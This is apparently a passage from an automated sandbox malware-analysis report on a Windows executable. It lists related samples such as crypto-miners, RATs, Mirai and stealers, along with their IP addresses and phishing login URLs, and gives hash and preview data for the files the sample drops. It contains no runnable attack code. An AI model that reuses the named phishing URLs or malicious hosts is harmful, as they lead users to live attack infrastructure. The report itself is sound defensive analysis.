                                                                                                          • 212.47.253.124
                                                                                                          obaTzlGNzi.exeGet hashmaliciousXmrig, zgRATBrowse
                                                                                                          • 163.172.154.142
                                                                                                          8EbwkHzF0i.exeGet hashmaliciousXmrig, zgRATBrowse
                                                                                                          • 163.172.154.142
                                                                                                          qZTW6BQiPB.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRATBrowse
                                                                                                          • 163.172.154.142
                                                                                                          us-east-1.route-1.000webhost.awex.ioXmz1XDgtah.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 145.14.145.191
                                                                                                          msedge_elf.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.129
                                                                                                          claro.596166.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.17
                                                                                                          czfsby2aHY.exeGet hashmaliciousAZORultBrowse
                                                                                                          • 145.14.144.104
                                                                                                          SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.145.70
                                                                                                          SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.29
                                                                                                          JZtRlvNAAe.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                          • 145.14.144.130
                                                                                                          file.zipGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                          • 145.14.145.72
                                                                                                          PO20152024.scr.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          • 145.14.145.149
                                                                                                          0VOqFZVzzg.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 145.14.145.16
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          AWEXUShttp://xred.site50.net/syn/SSLLibrary.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 153.92.0.100
                                                                                                          Xmz1XDgtah.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 145.14.145.191
                                                                                                          4fjy5gB1w6.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 153.93.11.255
                                                                                                          msedge_elf.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.129
                                                                                                          claro.596166.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.17
                                                                                                          xcBienFkvE.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 153.93.242.119
                                                                                                          DaN5NG0bt8.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 153.93.154.136
                                                                                                          czfsby2aHY.exeGet hashmaliciousAZORultBrowse
                                                                                                          • 145.14.144.104
                                                                                                          SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.145.70
                                                                                                          SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.29
                                                                                                          OnlineSASFRPHHOjspjmp.exeGet hashmaliciousCMSBruteBrowse
                                                                                                          • 51.15.246.170
                                                                                                          Isass.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 51.158.204.9
                                                                                                          Isass.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 51.158.204.9
                                                                                                          https://univ-paris13-4.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
                                                                                                          • 62.4.16.115
                                                                                                          https://univ-paris13-3.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
                                                                                                          • 62.4.16.115
                                                                                                          https://univ-paris13.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
                                                                                                          • 62.4.16.115
                                                                                                          SecuriteInfo.com.Trojan.GenericKD.72238195.888.8814.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 51.15.67.108
                                                                                                          SecuriteInfo.com.Trojan.GenericKD.72238195.888.8814.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 51.15.67.108
                                                                                                          dI3tFWyJ6d.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 51.159.169.211
                                                                                                          ayejQ3Qo2k.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 51.158.232.118
                                                                                                          AWEXUShttp://xred.site50.net/syn/SSLLibrary.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 153.92.0.100
                                                                                                          Xmz1XDgtah.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 145.14.145.191
                                                                                                          4fjy5gB1w6.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 153.93.11.255
                                                                                                          msedge_elf.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.129
                                                                                                          claro.596166.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.17
                                                                                                          xcBienFkvE.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 153.93.242.119
                                                                                                          DaN5NG0bt8.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 153.93.154.136
                                                                                                          czfsby2aHY.exeGet hashmaliciousAZORultBrowse
                                                                                                          • 145.14.144.104
                                                                                                          SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.145.70
                                                                                                          SecuriteInfo.com.Trojan.KillProc2.16811.26778.27406.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 145.14.144.29
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          28a2c9bd18a11de089ef85a160da29e4https://runrun.it/share/form/0GZMCgHSxRh4PBOMGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          Dragons Dogma 2 v1.0 Plus 36 Trainer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          http://421225.tctm.xyzGet hashmaliciousUnknownBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          InmateExport.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          http://www.technology-trend.comGet hashmaliciousUnknownBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          https://gelw.nalverd.com/AvGEoxV/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          Packing List PDF.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          ePI4igo4y1.exeGet hashmaliciousAsyncRATBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          POattach.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          http://www.ensp.fiocruz.br/portal-ensp/entrevista/counter.php?content=http://owens-minor.com&contentid=32190&link=https://nabbeton.com/!Get hashmaliciousUnknownBrowse
                                                                                                          • 13.85.23.86
                                                                                                          • 40.127.169.103
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Windows\Temp\zadejssjsckf.sysSecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse
                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.900.19500.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                              nissrv.exeGet hashmaliciousXmrigBrowse
                                                                                                                nissrv.exeGet hashmaliciousXmrigBrowse
                                                                                                                  Wave32bit.exeGet hashmaliciousUnknownBrowse
                                                                                                                    SecuriteInfo.com.Variant.Marsilia.120335.22241.7512.exeGet hashmaliciousMoneroocean Miner, XmrigBrowse
                                                                                                                      nissrv.exeGet hashmaliciousXmrigBrowse
                                                                                                                        DeltaX.exeGet hashmaliciousXmrigBrowse
                                                                                                                          SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                            Arceus.exeGet hashmaliciousXmrigBrowse
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1310720
                                                                                                                              Entropy (8bit):1.3315551444497749
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrv:KooCEYhgYEL0In
                                                                                                                              MD5:F7A91F1456B70427BC97DD25F133E8C2
                                                                                                                              SHA1:1384E19ED695DB0328B8C741019CDB83BBD61FBA
                                                                                                                              SHA-256:C46E0293E1D06C37A88CEAE32749078A042F19847F55B23C77A3AD26CE693435
                                                                                                                              SHA-512:71EA3360707335872BF205C88FF367901E9DBE6ED5BA5BBFC5263AC1DF13C11D21FA04E6050EB9CBF7767D1157655CA13D070D425FEA6D2D648A86712AB89978
                                                                                                                              Malicious:false
                                                                                                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x78e0b33c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1310720
                                                                                                                              Entropy (8bit):0.42217467398451
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
                                                                                                                              MD5:E3C6DC0C451E598B56D7AC997FF072EC
                                                                                                                              SHA1:C45D8A1E563B7895674DCEE3E899816BEECA083C
                                                                                                                              SHA-256:2159ACCFA7FEDD796B3BCD1494BF3A4092AFE5ECA3B93DD695FB743E219AD884
                                                                                                                              SHA-512:C5069B25BCB12515D75E86012D9E20602AEA698F790A15A77F9078E6A8E6C0458FBFAFACFCC1F8B2A406742EE9A3D585AC37C214B807CA054CE4BBC8EF0745F6
                                                                                                                              Malicious:false
                                                                                                                              Preview:x.<... .......A.......X\...;...{......................0.!..........{A..0...|].h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................)7!..0...|]..................!...0...|]..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):16384
                                                                                                                              Entropy (8bit):0.07682447733882056
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Ull8YeavGajn13a/hjrIBallcVO/lnlZMxZNQl:Ul6zHa53qlrI0Oewk
                                                                                                                              MD5:110380A1A1FD25E5ADAA56D9BD69A79F
                                                                                                                              SHA1:82AE0E92647A39398B852FE29837D7061060236A
                                                                                                                              SHA-256:53B04737F2FE4BEE6022C5FBB9E754492697EC67D0E7DC81C55E5D81137DF92F
                                                                                                                              SHA-512:4DE81804B1F22965123CBCF27CDAD5B3EF8AD35B319CA017AB7122D3A3992EA3AD9AADC636829C90A18440B03BEC2C86982D9898066481418A25D2BC4EA9941A
                                                                                                                              Malicious:false
                                                                                                                              Preview:+b;......................................;...{...0...|]......{A..............{A......{A..........{A].................!...0...|].........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\Desktop\gq83mrprwy.exe
                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2653184
                                                                                                                              Entropy (8bit):6.5408955513016656
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:tq+bulp7HM3wpNbmZTfpuentlEt4TNBKpjQBHYKiLz01AkC:tq+EZHM3AsZfpuulEt4TNBY0BeU1Ak
                                                                                                                              MD5:3B43DA1BE0C39802B78F6B2C55C4D7E6
                                                                                                                              SHA1:C7735B309F6543439E447DEF8351D7238F7C9D58
                                                                                                                              SHA-256:00F5CB420D8CAF253B67E22714104CE1FB2D75341286C6E3FF31F527E7E5F5EB
                                                                                                                              SHA-512:8696BCC429CEB8C2A8ACB5E4C4D1F963EB5E6DA41B9EDE3365D9046CBC287E97809545E3204B714591111AC77B4D653ED3849FE61A67A8645DDCF1B5A067BC5A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              • Antivirus: Virustotal, Detection: 58%, Browse
                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...P.+f.........."......|....'.....@..........@..............................(...........`....................................................<.............(...............(.x...............................(.......8...........`...X............................text....z.......|.................. ..`.rdata..............................@..@.data.....'.......'.................@....pdata........(......t(.............@..@.00cfg........(......v(.............@..@.tls..........(......x(.............@....reloc..x.....(......z(.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Nlllultnxj:NllU
                                                                                                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e................................................@..........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):55
                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                              Malicious:false
                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):1.1510207563435464
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Nlllulph:NllUp
                                                                                                                              MD5:6326A468428FB587CEDFEBBBB1475088
                                                                                                                              SHA1:0891D1C8C70198B7017A90BFF18C26CC86EDB06F
                                                                                                                              SHA-256:1968A53D7B132CF86C5866C43681DF7F9B57842594D65B63B232E370F6C20962
                                                                                                                              SHA-512:9CC56C44135634FA7AECDE5938B62FCFC1C8D9A43EF1BD58C308BF14B23922E6960DAC5BA24618ADD6EFF56F16BC6DF34E37DD8A30413BFC77ABAAA8D361C631
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e.................................f..............@..........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe
                                                                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):14544
                                                                                                                              Entropy (8bit):6.2660301556221185
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                              • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exe, Detection: malicious, Browse
                                                                                                                              • Filename: SecuriteInfo.com.Win32.PWSX-gen.900.19500.exe, Detection: malicious, Browse
                                                                                                                              • Filename: nissrv.exe, Detection: malicious, Browse
                                                                                                                              • Filename: nissrv.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                                                                                              • Filename: SecuriteInfo.com.Variant.Marsilia.120335.22241.7512.exe, Detection: malicious, Browse
                                                                                                                              • Filename: nissrv.exe, Detection: malicious, Browse
                                                                                                                              • Filename: DeltaX.exe, Detection: malicious, Browse
                                                                                                                              • Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Arceus.exe, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (3299)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):3304
                                                                                                                              Entropy (8bit):5.814015729828141
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:e51c1liMH6666C6OoS9TIpErUJbaiNhrfffffX:e1cTjH6666Cno8spEwBaQT
                                                                                                                              MD5:9B7E9FE9E2D77C33C9CE32C68DA4BC3B
                                                                                                                              SHA1:65B48AE1C5366F630745BE2DF843197BDFFD6FDE
                                                                                                                              SHA-256:300322B02D206FDAE57E26C548958A7B4370C93FCB5A799C2AAA44301AC0F974
                                                                                                                              SHA-512:E132325B00DD6C4FDA500981D6D629BBC5D9457A50C0AC13FE8859274935EA23502509F8328EEF0E2D893DDBBB7352292340DC391D878E06409D45A5390EBEA8
                                                                                                                              Malicious:false
                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                              Preview:)]}'.["",["final jeopardy april 25","southwest airlines airports","student loans","jackson state coach tomekia reed","blizzard canceled blizzcon","slipknot drummer","slack stewart butterfield","south carolina cicadas"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wZzhjOWcSIEZvcm1lciBDRU8gb2YgU2xhY2sgVGVjaG5vbG9naWVzMr8NZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBY0FBQUNBZ01CQVFBQUFBQUFBQUFBQUFBRUJRTUdBUUlIQ0FEL3hBQXpFQUFDQVFNQ0F3VUdCUVVBQUFBQUFBQUJBZ01BQkJFRkVpRXhRUVpSW
                                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                              Entropy (8bit):6.5408955513016656
                                                                                                                              TrID:
                                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:gq83mrprwy.exe
                                                                                                                              File size:2'653'184 bytes
                                                                                                                              MD5:3b43da1be0c39802b78f6b2c55c4d7e6
                                                                                                                              SHA1:c7735b309f6543439e447def8351d7238f7c9d58
                                                                                                                              SHA256:00f5cb420d8caf253b67e22714104ce1fb2d75341286c6e3ff31f527e7e5f5eb
